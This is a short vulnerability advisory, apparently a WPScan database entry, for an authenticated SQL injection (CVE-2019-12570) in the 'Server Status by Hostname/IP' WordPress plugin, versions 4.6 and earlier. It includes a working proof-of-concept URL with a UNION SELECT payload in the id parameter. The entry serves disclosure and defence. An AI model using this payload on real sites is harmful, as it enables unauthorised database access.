Server Status by Hostname/IP <= 4.6 - Authenticated SQL Injection



Description
When last checked, the plugin was still affected and had been closed.

Proof of Concept
http://www.example.com/wp-admin/admin.php?page=all-servers&id=2+UNION+SELECT+1%2C2%2C3%2C%40%40version+&action=edit

Affects Plugin

No known fix (plugin closed)

References

CVE 2019-12570
URL https://github.com/ivoschyk-cs/exploit_wp/blob/master/CVE-2019-12570

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Original Researcher Ihor Voschyk
Submitter Ryan Dewhurst
Submitter Website https://wpscan.io
Submitter Twitter ethicalhack3r
Verified No
WPVDB ID 9964

Timeline

Publicly Published 2019-07-01
Added 2019-12-02
Last Updated 2020-02-13
